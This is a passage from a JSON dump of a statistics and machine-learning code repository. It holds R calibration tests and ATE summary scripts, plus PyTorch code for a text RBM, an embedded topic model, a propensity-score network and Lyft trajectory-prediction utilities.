expect_equal(stratifiedBrier(y.true, y.prob)[[1]], 0.41818181890909089660)\n expect_equal(stratifiedBrier(y.true, y.prob)[[2]], 0.53925619983471062557)\n expect_equal(stratifiedBrier(y.true, y.prob)[[3]], 0.33746556495867768843)\n\n})\n\ntest_that(\"bagCalibrate's output has the same length as y.test\", {\n\n expect_equal(length(bagCalibrate(train_set, X.test, 'y', model='svm',\n type = 'C-classification', kernel = 'linear')), length(y.test))\n\n})\n" }, { "alpha_fraction": 0.4687179625034332, "alphanum_fraction": 0.482051283121109, "avg_line_length": 39.64583206176758, "blob_id": "27d6b971b94c7c667a53e9c33d476be7c1d0e7a7", "content_id": "f8e43d31fd5e5be105a346f25f474b351c3744ec", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "R", "length_bytes": 1950, "license_type": "no_license", "max_line_length": 80, "num_lines": 48, "path": "/textual_causality/ate/get_ate_summary.R", "repo_name": "yuyangstatistics/projects", "src_encoding": "UTF-8", "text": 
"library(dplyr)\n\nget.res.print <- function(ate_res, save_path) {\n ate_res_print <- as.data.frame(ate_res) %>% \n group_by(Setting, alpha, beta, gamma) %>%\n summarise(y.mean.sd = sd(y.mean),\n y.mean = mean(y.mean), \n Truth = mean(Truth), \n Unadjusted.sd = sd(Unadjusted), \n Unadjusted = mean(Unadjusted), \n PSReg.sd = sd(PSReg), \n PSReg = mean(PSReg), \n PSS.sd = sd(PSS),\n PSS = mean(PSS), \n IPW.sd = sd(IPW), \n IPW = mean(IPW), \n IPW2.sd = sd(IPW2),\n IPW2 = mean(IPW2)) %>%\n mutate(y.mean = paste(round(y.mean, 4), \"(\", \n round(y.mean.sd, 5), \")\", sep = \"\"), \n Truth = round(Truth, 4), \n Unadjusted = paste(round(Unadjusted, 4), \"(\", \n round(Unadjusted.sd, 5), \")\", sep = \"\"), \n PSReg = paste(round(PSReg, 4), \"(\", \n round(PSReg.sd, 5), \")\", sep = \"\"), \n PSS = paste(round(PSS, 4), \"(\", \n round(PSS.sd, 5), \")\", sep = \"\"), \n IPW = paste(round(IPW, 4), \"(\", \n round(IPW.sd, 5), \")\", sep = \"\"), \n IPW2 = paste(round(IPW2, 4), \"(\", \n round(IPW2.sd, 5), \")\", sep = \"\") \n ) %>% \n select(alpha, beta, gamma, y.mean, Truth, Unadjusted, PSReg, PSS, IPW, IPW2)\n \n ate_res_print <- as.data.frame(ate_res_print)\n rownames(ate_res_print) <- paste(\"Setting\", ate_res_print$Setting)\n ate_res_print <- ate_res_print[, 2:ncol(ate_res_print)]\n write.csv(ate_res_print, file = save_path)\n}\n\n\nate_res <- read.csv(\"../results/ate_results.csv\")\nate_res <- ate_res[, 2:ncol(ate_res)]\nget.res.print(ate_res, \"../results/ate_results_print.csv\")\n\nate_res <- read.csv(\"../results/ate_results2.csv\")\nate_res <- ate_res[, 2:ncol(ate_res)]\nget.res.print(ate_res, \"../results/ate_results_print2.csv\")" }, { "alpha_fraction": 0.5363464951515198, "alphanum_fraction": 0.5495291948318481, "avg_line_length": 35.875, "blob_id": "c0b98096c04e1947ed4c41cecedc69186e242260", "content_id": "eca0c489ed51a0bfd1dc195e781a29f42e1d1787", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", 
"length_bytes": 2655, "license_type": "permissive", "max_line_length": 217, "num_lines": 72, "path": "/rbm_summarizer/train_textRBM/textRBM.py", "repo_name": "yuyangstatistics/projects", "src_encoding": "UTF-8", "text": "import numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom torch.autograd import Variable\n\n\n\n\nclass TextRBM(nn.Module):\n def __init__(self,\n n_vis=15000,\n n_hin=200,\n k=1,\n device='cpu'):\n super(TextRBM, self).__init__()\n self.W = nn.Parameter(torch.randn(n_hin,n_vis)*1e-2)\n self.v_bias = nn.Parameter(torch.zeros(n_vis))\n self.h_bias = nn.Parameter(torch.zeros(n_hin))\n self.k = k\n self.device=device\n\n def sample_bernoulli(self,p):\n # p can be a tensor of any size\n return F.relu(torch.sign(p - Variable(torch.rand(p.size())).to(self.device))) # draw binary samples with p being the probablity of being 1, we can also use bernoulli, this implementation is just more bottom.\n # return torch.distributions.Bernoulli(p).sample()\n \n def sample_multinomial(self, p):\n # p should be a tensor of dimension (K,) with sum = 1\n # check my notes for detailed algorithm\n p = torch.cat((torch.Tensor([0]).to(self.device), p), 0)\n c = torch.cumsum(p, dim=0)\n g = F.relu(torch.sign(c - Variable(torch.rand(1)).to(self.device)))\n\n return (1 - g[:-1]) * g[1:]\n # return torch.distributions.Multinomial(1, p).sample()\n\n def v_to_h(self,v, d):\n p_h = torch.sigmoid(F.linear(v, self.W) + \\\n torch.mm(d.float().unsqueeze(-1), self.h_bias.unsqueeze(0)))\n sample_h = self.sample_bernoulli(p_h)\n return p_h,sample_h\n\n def h_to_v(self,h, d):\n p_v = torch.nn.Softmax(dim=-1)(F.linear(h,self.W.t(),self.v_bias))\n sample_v = torch.stack([torch.stack([self.sample_multinomial(p_v_i) for _ in range(d_i)]).sum(0) for (p_v_i, d_i) in zip(p_v, d)])\n return p_v,sample_v\n \n def forward(self,v):\n with torch.no_grad():\n v = v.float()\n d = v.sum(-1).int()\n p_h1,h1 = self.v_to_h(v, d)\n \n h_ = 
h1\n for _ in range(self.k):\n p_v_,v_ = self.h_to_v(h_, d)\n p_h_,h_ = self.v_to_h(v_, d)\n \n return v,v_\n\n def free_energy(self,v):\n v = v.float()\n d = v.sum(-1).int()\n vbias_term = v.mv(self.v_bias) # torch.mv() performs a matrix-vector product\n wx_b = F.linear(v, self.W) + \\\n torch.mm(d.float().unsqueeze(-1), self.h_bias.unsqueeze(0))\n # hidden_term = wx_b.exp().add(1).log().sum(1)\n hidden_term = F.softplus(wx_b).sum(1) # for numerical stability\n\n return (-hidden_term - vbias_term).mean()\n" }, { "alpha_fraction": 0.7072649598121643, "alphanum_fraction": 0.7158119678497314, "avg_line_length": 43.619049072265625, "blob_id": "50bd3e05d3a5e616f5283e8aa9847ae1af197f56", "content_id": "f4944c3afa114ad17d7feb5e15acf016b65be4a9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 936, "license_type": "no_license", "max_line_length": 117, "num_lines": 21, "path": "/textual_causality/etm-ps/get_lens.py", "repo_name": "yuyangstatistics/projects", "src_encoding": "UTF-8", "text": "\"\"\"This file is to get the document length distribution.\"\"\"\nfrom transformers import RobertaTokenizer\nfrom functools import partial\nfrom data_utils import collate_mp, CNNDM\nfrom torch.utils.data import DataLoader\nfrom collections import OrderedDict\nimport json\n\nif __name__ == \"__main__\":\n\n tok = RobertaTokenizer.from_pretrained(\"roberta-base\")\n train_dataset = CNNDM(f\"/home/yang6367/summarizer/cnn-dailymail/processed/train\", \"roberta-base\", is_test=False)\n collate_fn = partial(collate_mp, pad_token_id=tok.pad_token_id, vocab_size=tok.vocab_size, is_test=False)\n train_dataloader = DataLoader(train_dataset, batch_size=256, shuffle=False, num_workers=4, collate_fn=collate_fn)\n \n doc_lens = OrderedDict()\n for batch in train_dataloader:\n doc_lens.update(zip(batch[\"text_ids\"], batch[\"src_input_lens\"]))\n \n with open('save/document_lengths.json', 'w') as fp:\n json.dump(doc_lens, fp)" }, { 
"alpha_fraction": 0.7833333611488342, "alphanum_fraction": 0.7833333611488342, "avg_line_length": 14, "blob_id": "966f199860357d53c84999e454b91a261052bfa3", "content_id": "5dfb9a9dff7e26097c011ece41c215d56bb79866", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "R", "length_bytes": 60, "license_type": "no_license", "max_line_length": 22, "num_lines": 4, "path": "/imbCalib/package/imbCalib/tests/testthat.R", "repo_name": "yuyangstatistics/projects", "src_encoding": "UTF-8", "text": "library(testthat)\nlibrary(imbCalib)\n\ntest_check(\"imbCalib\")\n" }, { "alpha_fraction": 0.5577870607376099, "alphanum_fraction": 0.5649867653846741, "avg_line_length": 37.4963493347168, "blob_id": "08f739bd3283f31e2d7bdcd0b85a12583ff9dc3e", "content_id": "539a7d97e8efb429c860254faac0ea4adf8d7d56", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5278, "license_type": "no_license", "max_line_length": 118, "num_lines": 137, "path": "/textual_causality/etm-ps/models.py", "repo_name": "yuyangstatistics/projects", "src_encoding": "UTF-8", "text": "import torch\nimport torch.nn.functional as F \nfrom torch import nn\nfrom torch.nn.modules.activation import ReLU, Sigmoid\nfrom torch.nn.modules.batchnorm import BatchNorm1d\n\nclass PSNet(nn.Module):\n def __init__(self, n_features, n_hidden_1=1000, n_hidden_2=300):\n super(PSNet, self).__init__()\n self.net = nn.Sequential(\n nn.Linear(n_features, n_hidden_1), \n nn.BatchNorm1d(n_hidden_1), \n nn.LeakyReLU(), \n nn.Linear(n_hidden_1, n_hidden_2), \n nn.BatchNorm1d(n_hidden_2), \n nn.LeakyReLU(), \n nn.Linear(n_hidden_2, 1), \n nn.Sigmoid()\n )\n \n def forward(self, x):\n return self.net(x)\n\nclass ETM(nn.Module):\n def __init__(self, num_topics, vocab_size, embed_size, vi_nn_hidden_size, \n theta_act, embeddings=None, enc_drop=0.5):\n super(ETM, self).__init__()\n\n ## define hyperparameters\n self.num_topics = num_topics\n self.vocab_size = 
vocab_size\n self.embed_size = embed_size\n self.vi_nn_hidden_size = vi_nn_hidden_size\n self.enc_drop = enc_drop\n self.nn_drop = nn.Dropout(enc_drop)\n self.theta_act = self.get_activation(theta_act)\n \n ## define the word embedding matrix \\rho\n if embeddings is None:\n self.rho = nn.Linear(embed_size, vocab_size, bias=False) # self.rho.weight: (vocab_size x embed_size)\n else:\n self.rho = nn.Parameter(embeddings.clone().float(), requires_grad=False)\n\n ## define the matrix containing the topic embeddings\n self.alphas = nn.Linear(embed_size, num_topics, bias=False) #nn.Parameter(torch.randn(embed_size, num_topics))\n \n ## define variational distribution for \\theta_{1:D} via amortizartion\n self.q_theta = nn.Sequential(\n nn.Linear(vocab_size, vi_nn_hidden_size, bias=True), \n self.theta_act,\n nn.Linear(vi_nn_hidden_size, vi_nn_hidden_size, bias=True),\n self.theta_act,\n )\n self.mu_q_theta = nn.Linear(vi_nn_hidden_size, num_topics, bias=True)\n self.logsigma_q_theta = nn.Linear(vi_nn_hidden_size, num_topics, bias=True) # log of variance\n\n def get_activation(self, act):\n if act == 'tanh':\n act = nn.Tanh()\n elif act == 'relu':\n act = nn.ReLU()\n elif act == 'softplus':\n act = nn.Softplus()\n elif act == 'rrelu':\n act = nn.RReLU()\n elif act == 'leakyrelu':\n act = nn.LeakyReLU()\n elif act == 'elu':\n act = nn.ELU()\n elif act == 'selu':\n act = nn.SELU()\n elif act == 'glu':\n act = nn.GLU()\n else:\n print('Defaulting to tanh activations...')\n act = nn.Tanh()\n return act \n\n def forward(self, normalized_bows=None, theta=None, beta_only=False):\n \n beta = self.get_beta() # (K x vocab_size)\n if beta_only: \n return beta\n\n if theta is None:\n theta, kld_theta = self.get_theta(normalized_bows)\n else:\n kld_theta = None\n\n preds = self.decode(theta, beta) # (batch_size x vocab_size)\n topic_feature = torch.mm(theta, self.alphas.weight) # (batch_size x embed_size)\n \n return beta, theta, kld_theta, preds, topic_feature\n\n def 
get_beta(self):\n try:\n logit = self.alphas(self.rho.weight) # (vocab_size x K) # torch.mm(self.rho, self.alphas)\n except:\n logit = self.alphas(self.rho)\n beta = F.softmax(logit, dim=0).transpose(1, 0) \n return beta # (K x vocab_size) \n\n def get_theta(self, normalized_bows):\n mu_theta, logsigma_theta, kld_theta = self.encode(normalized_bows)\n z = self.reparameterize(mu_theta, logsigma_theta) # (batch_size x K)\n theta = F.softmax(z, dim=-1) # (batch_size, K)\n return theta, kld_theta\n\n def encode(self, bows):\n \"\"\"Returns paramters of the variational distribution for \\theta.\n\n input: bows\n batch of bag-of-words...tensor of shape bsz x V\n output: mu_theta, log_sigma_theta\n \"\"\"\n q_theta = self.q_theta(bows) # (batch_size x vi_nn_hidden_size)\n if self.enc_drop > 0:\n q_theta = self.nn_drop(q_theta)\n mu_theta = self.mu_q_theta(q_theta) # (batch_size x K)\n logsigma_theta = self.logsigma_q_theta(q_theta) # (batch_size x K)\n kl_theta = -0.5 * torch.sum(1 + logsigma_theta - mu_theta.pow(2) - logsigma_theta.exp(), dim=-1).mean()\n return mu_theta, logsigma_theta, kl_theta\n\n def reparameterize(self, mu, logvar):\n \"\"\"Returns a sample from a Gaussian distribution via reparameterization.\n \"\"\"\n if self.training:\n std = torch.exp(0.5 * logvar) # (batch_size x K)\n eps = torch.randn_like(std) # N(0, 1) of dimension (batch_size x K) \n return eps.mul_(std).add_(mu) # will do elementwise multiplication and addition\n else:\n return mu\n\n def decode(self, theta, beta):\n res = torch.mm(theta, beta) # (batch_size x vocab_size)\n preds = torch.log(res+1e-6)\n return preds \n\n\n\n" }, { "alpha_fraction": 0.618087649345398, "alphanum_fraction": 0.624005913734436, "avg_line_length": 39.66165542602539, "blob_id": "30436d125f40c9d065cf5cd015199f6964642d56", "content_id": "0cb3129d0c4f45b692a4b9b8ba0e250acc049741", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5407, "license_type": 
"no_license", "max_line_length": 139, "num_lines": 133, "path": "/textual_causality/etm-ps/test_ps2.py", "repo_name": "yuyangstatistics/projects", "src_encoding": "UTF-8", "text": "\"\"\"Test the Propensity Score model on CNNDM.\nBased on ps2 model.\n\"\"\"\nimport torch\nimport torch.nn as nn\nfrom torch.utils.data import DataLoader\nfrom transformers import RobertaTokenizer, RobertaModel\nfrom collections import OrderedDict\nfrom json import dumps\nfrom tqdm import tqdm\nimport os\nfrom functools import partial\n\nimport util\nfrom args import get_test_args\nfrom data_utils import collate_mp, CNNDM\nfrom models import ETM, PSNet\nimport json\nimport csv\n\n\ndef main(args):\n # Set up logging and devices\n args.save_dir = util.get_save_dir(args.save_dir, args.name, training=False)\n log = util.get_logger(args.save_dir, args.name)\n device = util.get_devices(args.gpu_ids)\n log.info(f'Args: {dumps(vars(args), indent=4, sort_keys=True)}')\n args.batch_size *= max(1, len(args.gpu_ids))\n args.sim_data_save_path = os.path.join(args.save_dir, 'sim_data.csv')\n\n # Get embeddings\n log.info('Loading embeddings...')\n tokenizer = RobertaTokenizer.from_pretrained(args.model_type, verbose = False)\n encoder = RobertaModel.from_pretrained(args.model_type)\n embeddings = encoder.embeddings.word_embeddings.weight # 50265 x 768\n embed_size = embeddings.size(1)\n vocab_size = tokenizer.vocab_size\n\n # Get data loader\n log.info('Building dataset...')\n dataset = CNNDM(os.path.join(args.data_dir, args.split), args.model_type, is_test = False)\n collate_fn = partial(collate_mp, pad_token_id = tokenizer.pad_token_id, \n vocab_size = vocab_size, is_test = False)\n data_loader = DataLoader(dataset, batch_size=args.batch_size, shuffle=False, \n num_workers=args.num_workers, collate_fn=collate_fn)\n\n # Get ETM\n log.info('Building ETM...')\n etm = ETM(args.num_topics, vocab_size, embed_size, args.vi_nn_hidden_size,\n args.theta_act, embeddings, args.enc_drop)\n log.info(f\"ETM: 
{etm}\")\n\n etm = nn.DataParallel(etm, args.gpu_ids)\n log.info(f'Loading ETM checkpoint from {args.etm_load_path}...')\n etm= util.load_model(etm, args.etm_load_path, args.gpu_ids, return_step=False)\n\n etm = etm.to(device)\n etm.eval()\n for param in etm.parameters():\n param.requires_grad = False\n\n # get PS model\n log.info('Building Propensity Neural Net Model...')\n model = PSNet(n_features=args.num_topics)\n model = nn.DataParallel(model, args.gpu_ids)\n log.info(f'Loading PSNet checkpoint from {args.ps_load_path}...')\n model = util.load_model(model, args.ps_load_path, args.gpu_ids, return_step=False)\n log.info(f\"PS Model: {model}\")\n model = model.to(device)\n model.eval()\n\n ## Set up simulation\n # load propensity score dictionary\n with open(args.ps_path) as fp:\n ps_dict = json.load(fp)\n log.info(f\"Propensity Score Dictionary: {ps_dict}\")\n\n # write the header of the simulation file\n with open(args.sim_data_save_path, 'w+', newline ='') as fp:\n write = csv.writer(fp)\n write.writerow([\"Treat\", \"True_PS\", \"Response\", \"Est_PS\"])\n\n # Test\n log.info(f'Evaluating on {args.split} split...')\n bce_meter = util.AverageMeter()\n acc_meter = util.AverageMeter()\n criterion = nn.BCELoss()\n\n with torch.no_grad(), tqdm(total=len(data_loader.dataset)) as progress_bar:\n for batch in data_loader:\n bows = batch[\"src_bows\"].to(device) # (batch_size x vocab_size)\n batch_size = bows.size(0)\n sums = bows.sum(1).unsqueeze(1) # (batch_size x 1)\n if args.bow_norm:\n normalized_bows = bows / sums # (batch_size x vocab_size)\n else:\n normalized_bows = bows\n \n _, theta, _, _, _ = etm(normalized_bows=normalized_bows) # (batch_size x K)\n output = model(theta).squeeze() # (batch_size, )\n src_input_lens = batch[\"src_input_lens\"].to(device)\n target = 1.0 * (src_input_lens > args.doc_len_threshold) # (batch_size, ), 1.0 to make it to float\n loss = criterion(output, target)\n pred = 1.0 * (output > 0.5)\n accuracy = (1.0 * (pred == 
target)).mean()\n\n bce_meter.update(loss.item(), batch_size)\n acc_meter.update(accuracy.item(), batch_size)\n\n # Log info\n progress_bar.update(batch_size)\n progress_bar.set_postfix(BCE=bce_meter.avg, \n ACC=acc_meter.avg)\n\n # Simulate data\n propensity_scores = torch.FloatTensor([ps_dict[f\"{typ}\"] for typ in batch['src_keywords_inclusion_types'].tolist()]).to(device)\n responses = torch.bernoulli(torch.sigmoid(args.alpha * target + args.beta * propensity_scores + args.gamma)) # (batch_size, )\n sim_data = torch.stack([target, propensity_scores, responses, output]).transpose(0, 1) # (batch_size x 4)\n with open(args.sim_data_save_path, 'a+', newline ='') as fp:\n write = csv.writer(fp)\n write.writerows(sim_data.tolist())\n \n results_list = [('BCE', bce_meter.avg), ('ACC', acc_meter.avg)]\n results = OrderedDict(results_list)\n \n # Log to console\n results_str = ', '.join(f'{k}: {v:05.2f}' for k, v in results.items())\n log.info(f'{args.split.title()} {results_str}')\n log.info(f\"The simulated data has been saved to '{args.sim_data_save_path}'.\")\n \n\nif __name__ == '__main__':\n main(get_test_args())" }, { "alpha_fraction": 0.637599527835846, "alphanum_fraction": 0.6476550698280334, "avg_line_length": 40.30232620239258, "blob_id": "ed6c37bf6e7b33d2e0588287a8bb8a3221c858ea", "content_id": "f0ea3568dc61cc10f20aaa8a4768168846eadbd0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 12431, "license_type": "no_license", "max_line_length": 130, "num_lines": 301, "path": "/lyft/utils.py", "repo_name": "yuyangstatistics/projects", "src_encoding": "UTF-8", "text": "# --- Function utils ---\n# Original code from https://github.com/lyft/l5kit/blob/20ab033c01610d711c3d36e1963ecec86e8b85b6/l5kit/l5kit/evaluation/metrics.py\nimport numpy as np\n\nimport torch\nfrom torch import Tensor\nimport logging\nimport os\nimport queue\nimport shutil\nimport random\nfrom tqdm import tqdm\n\nfrom models import 
LyftEffnet, LyftDensenet, LyftEffnetb7\n\ndef pytorch_neg_multi_log_likelihood_batch(\n gt: Tensor, pred: Tensor, confidences: Tensor, avails: Tensor, device\n) -> Tensor:\n \"\"\"\n Compute a negative log-likelihood for the multi-modal scenario.\n log-sum-exp trick is used here to avoid underflow and overflow, For more information about it see:\n https://en.wikipedia.org/wiki/LogSumExp#log-sum-exp_trick_for_log-domain_calculations\n https://timvieira.github.io/blog/post/2014/02/11/exp-normalize-trick/\n https://leimao.github.io/blog/LogSumExp/\n Args:\n gt (Tensor): array of shape (bs)x(time)x(2D coords)\n pred (Tensor): array of shape (bs)x(modes)x(time)x(2D coords)\n confidences (Tensor): array of shape (bs)x(modes) with a confidence for each mode in each sample\n avails (Tensor): array of shape (bs)x(time) with the availability for each gt timestep\n Returns: \n Tensor: negative log-likelihood for this example, a single float number\n \"\"\"\n assert len(pred.shape) == 4, f\"expected 3D (MxTxC) array for pred, got {pred.shape}\"\n batch_size, num_modes, future_len, num_coords = pred.shape\n\n assert gt.shape == (batch_size, future_len, num_coords), f\"expected 2D (Time x Coords) array for gt, got {gt.shape}\"\n assert confidences.shape == (batch_size, num_modes), f\"expected 1D (Modes) array for gt, got {confidences.shape}\"\n assert torch.allclose(torch.sum(confidences, dim=1), confidences.new_ones((batch_size,))), \"confidences should sum to 1\"\n assert avails.shape == (batch_size, future_len), f\"expected 1D (Time) array for gt, got {avails.shape}\"\n # assert all data are valid\n assert torch.isfinite(pred).all(), \"invalid value found in pred\"\n assert torch.isfinite(gt).all(), \"invalid value found in gt\"\n assert torch.isfinite(confidences).all(), \"invalid value found in confidences\"\n assert torch.isfinite(avails).all(), \"invalid value found in avails\"\n\n # convert to (batch_size, num_modes, future_len, num_coords)\n gt = torch.unsqueeze(gt, 1) 
# add modes\n avails = avails[:, None, :, None] # add modes and cords\n\n # error (batch_size, num_modes, future_len)\n error = torch.sum(((gt - pred) * avails) ** 2, dim=-1) # reduce coords and use availability\n\n with np.errstate(divide=\"ignore\"): # when confidence is 0 log goes to -inf, but we're fine with it\n # error (batch_size, num_modes)\n error = torch.log(confidences) - 0.5 * torch.sum(error, dim=-1) # reduce time\n\n # use max aggregator on modes for numerical stability\n # error (batch_size, num_modes)\n max_value, _ = error.max(dim=1, keepdim=True) # error are negative at this point, so max() gives the minimum one\n error = -torch.log(torch.sum(torch.exp(error - max_value), dim=-1, keepdim=True)) - max_value # reduce modes\n # print(\"error\", error)\n return torch.mean(error)\n\n\ndef weighted_pytorch_neg_multi_log_likelihood_batch(\n gt: Tensor, pred: Tensor, confidences: Tensor, avails: Tensor, device\n) -> Tensor:\n \"\"\"\n Compute a negative log-likelihood for the multi-modal scenario.\n log-sum-exp trick is used here to avoid underflow and overflow, For more information about it see:\n https://en.wikipedia.org/wiki/LogSumExp#log-sum-exp_trick_for_log-domain_calculations\n https://timvieira.github.io/blog/post/2014/02/11/exp-normalize-trick/\n https://leimao.github.io/blog/LogSumExp/\n Args:\n gt (Tensor): array of shape (bs)x(time)x(2D coords)\n pred (Tensor): array of shape (bs)x(modes)x(time)x(2D coords)\n confidences (Tensor): array of shape (bs)x(modes) with a confidence for each mode in each sample\n avails (Tensor): array of shape (bs)x(time) with the availability for each gt timestep\n Returns: \n Tensor: negative log-likelihood for this example, a single float number\n \"\"\"\n assert len(pred.shape) == 4, f\"expected 3D (MxTxC) array for pred, got {pred.shape}\"\n batch_size, num_modes, future_len, num_coords = pred.shape\n\n assert gt.shape == (batch_size, future_len, num_coords), f\"expected 2D (Time x Coords) array for gt, got 
{gt.shape}\"\n assert confidences.shape == (batch_size, num_modes), f\"expected 1D (Modes) array for gt, got {confidences.shape}\"\n assert torch.allclose(torch.sum(confidences, dim=1), confidences.new_ones((batch_size,))), \"confidences should sum to 1\"\n assert avails.shape == (batch_size, future_len), f\"expected 1D (Time) array for gt, got {avails.shape}\"\n # assert all data are valid\n assert torch.isfinite(pred).all(), \"invalid value found in pred\"\n assert torch.isfinite(gt).all(), \"invalid value found in gt\"\n assert torch.isfinite(confidences).all(), \"invalid value found in confidences\"\n assert torch.isfinite(avails).all(), \"invalid value found in avails\"\n\n # convert to (batch_size, num_modes, future_len, num_coords)\n gt = torch.unsqueeze(gt, 1) # add modes\n avails = avails[:, None, :, None] # add modes and cords\n\n # error (batch_size, num_modes, future_len)\n error = torch.sum(((gt - pred) * avails) ** 2, dim=-1) # reduce coords and use availability\n\n ##===== add weights ======##\n weights = torch.Tensor([1.012 ** i for i in range(future_len)]).to(device)\n # add softmax to normalize, and then scale up\n weights = torch.nn.functional.softmax(weights) * future_len\n weights = weights.repeat(batch_size, num_modes, 1)\n error = error * weights\n ##========================##\n\n with np.errstate(divide=\"ignore\"): # when confidence is 0 log goes to -inf, but we're fine with it\n # error (batch_size, num_modes)\n error = torch.log(confidences) - 0.5 * torch.sum(error, dim=-1) # reduce time\n\n # use max aggregator on modes for numerical stability\n # error (batch_size, num_modes)\n max_value, _ = error.max(dim=1, keepdim=True) # error are negative at this point, so max() gives the minimum one\n error = -torch.log(torch.sum(torch.exp(error - max_value), dim=-1, keepdim=True)) - max_value # reduce modes\n # print(\"error\", error)\n return torch.mean(error)\n\n\ndef pytorch_neg_multi_log_likelihood_single(\n gt: Tensor, pred: Tensor, avails: 
Tensor\n) -> Tensor:\n \"\"\"\n\n Args:\n gt (Tensor): array of shape (bs)x(time)x(2D coords)\n pred (Tensor): array of shape (bs)x(time)x(2D coords)\n avails (Tensor): array of shape (bs)x(time) with the availability for each gt timestep\n Returns:\n Tensor: negative log-likelihood for this example, a single float number\n \"\"\"\n # pred (bs)x(time)x(2D coords) --> (bs)x(mode=1)x(time)x(2D coords)\n # create confidence (bs)x(mode=1)\n batch_size, future_len, num_coords = pred.shape\n confidences = pred.new_ones((batch_size, 1))\n return pytorch_neg_multi_log_likelihood_batch(gt, pred.unsqueeze(1), confidences, avails)\n\n\ndef get_logger(log_dir, name):\n class StreamHandlerWithTQDM(logging.Handler):\n \"\"\"Let `logging` print without breaking `tqdm` progress bars.\n\n See Also:\n > https://stackoverflow.com/questions/38543506\n \"\"\"\n def emit(self, record):\n try:\n msg = self.format(record)\n tqdm.write(msg)\n self.flush()\n except (KeyboardInterrupt, SystemExit):\n raise\n except:\n self.handleError(record)\n \n # create the logger\n logger = logging.getLogger(name)\n logger.setLevel(logging.DEBUG)\n\n # file handler\n log_path = os.path.join(log_dir, \"log.txt\")\n file_handler = logging.FileHandler(log_path)\n file_handler.setLevel(logging.DEBUG)\n\n # console handler\n console_handler = StreamHandlerWithTQDM()\n console_handler.setLevel(logging.INFO)\n\n # set format\n file_formatter = logging.Formatter('[%(asctime)s] %(message)s', \\\n datefmt='%m.%d.%y %H:%M:%S')\n file_handler.setFormatter(file_formatter)\n console_formatter = logging.Formatter('[%(asctime)s] %(message)s', \\\n datefmt='%m.%d.%y %H:%M:%S')\n console_handler.setFormatter(console_formatter)\n\n # add handlers to the logger\n logger.addHandler(file_handler)\n logger.addHandler(console_handler)\n\n return logger\n \n\ndef set_seed(seed):\n random.seed(seed)\n np.random.seed(seed)\n os.environ[\"PYTHONHASHSEED\"] = str(seed)\n torch.manual_seed(seed)\n 
torch.cuda.manual_seed(seed)\n\n\ndef get_save_dir(base_dir, name, training, id_max = 20):\n for uid in range(1, id_max):\n subdir = 'train' if training else 'test'\n save_dir = os.path.join(base_dir, subdir, f\"{name}-{uid:02d}\")\n if not os.path.exists(save_dir):\n os.makedirs(save_dir)\n return save_dir\n \n raise RuntimeError(\"Too many save directories with the same name. \\\n Delete one old directory or use a new name.\")\n\ndef get_devices(gpu_ids=[0]):\n if torch.cuda.is_available():\n device = torch.device(f\"cuda:{gpu_ids[0]}\")\n torch.cuda.set_device(device)\n else:\n device = torch.device(\"cpu\")\n return device\n\n\n\nclass CheckpointSaver():\n def __init__(self, save_dir, max_chckpoints=10, log=None):\n self.save_dir = save_dir\n self.max_chckpoints = max_chckpoints\n self.log = log\n self.best_val = None\n self.ckpt_paths = queue.PriorityQueue()\n self._print(f\"Initialize a saver which tracks loss minimization.\")\n\n def is_best(self, metric_val):\n if metric_val is None:\n return False\n if self.best_val is None:\n return True\n return (metric_val < self.best_val)\n\n def _print(self, message):\n if self.log is not None:\n self.log.info(message)\n \n def save(self, step, model, metric_val, device):\n \"\"\"\n Save model parameters and keep track of the best one.\n\n Parameters:\n -----------\n step: total number of examples we have seen so far\n \"\"\"\n ckpt_dict = {'model_name': model.__class__.__name__, \n 'model_state': model.cpu().state_dict(), \n 'step': step, }\n model.to(device)\n\n ckpt_path = os.path.join(self.save_dir, f'step_{step}.pth.tar')\n torch.save(ckpt_dict, ckpt_path)\n self._print(f\"Saved checkpoint: {ckpt_path}.\")\n\n if self.is_best(metric_val):\n self.best_val = metric_val\n best_path = os.path.join(self.save_dir, f\"best.pth.tar\")\n shutil.copy(ckpt_path, best_path)\n self._print(f\"New best checkpoint at step {step}.\")\n \n # add checkpoints to the priority queue. 
we use loss, so the order is -metric_val\n self.ckpt_paths.put((-metric_val, ckpt_path))\n\n # remove worst chekcpoints\n if self.ckpt_paths.qsize() > self.max_chckpoints:\n _, worst_ckpt = self.ckpt_paths.get()\n try:\n os.remove(worst_ckpt)\n self._print(f\"Removed checkpoint: {worst_ckpt}.\")\n except OSError:\n pass\n\n\ndef load_model(model, ckpt_path, gpu_ids, return_step = True):\n device = f\"cuda:{gpu_ids[0]}\" if torch.cuda.is_available() else \"cpu\"\n ckpt_dict = torch.load(ckpt_path, map_location = device)\n model.load_state_dict(ckpt_dict[\"model_state\"])\n \n if return_step:\n step = ckpt_dict[\"step\"]\n return model, step\n \n return model\n\n\ndef init_model(cfg):\n if cfg[\"name\"] == \"effnetb4\":\n return LyftEffnet(cfg)\n if cfg[\"name\"] == \"densenet161\":\n return LyftDensenet(cfg)\n if cfg[\"name\"] == \"effnetb7\":\n return LyftEffnetb7(cfg)\n raise f\"Only supports effnetb4, effnetb7 and densenet161\"\n\n\ndef forward(data, model, device, criterion = pytorch_neg_multi_log_likelihood_batch):\n inputs = data[\"image\"].to(device)\n target_availabilities = data[\"target_availabilities\"].to(device)\n targets = data[\"target_positions\"].to(device)\n batch_size = inputs.size(0)\n # Forward pass\n preds, confidences = model(inputs)\n loss = criterion(targets, preds, confidences, target_availabilities, device=device)\n return loss, preds, confidences, batch_size" }, { "alpha_fraction": 0.6420788168907166, "alphanum_fraction": 0.7444816827774048, "avg_line_length": 41.85029983520508, "blob_id": "1261e48632e025c637a0c40f2ad9b73f42bf0bc5", "content_id": "e4d6e0e0b4093d40b430056d4078f44ce7d10497", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 7158, "license_type": "permissive", "max_line_length": 354, "num_lines": 167, "path": "/rbm_summarizer/README.md", "repo_name": "yuyangstatistics/projects", "src_encoding": 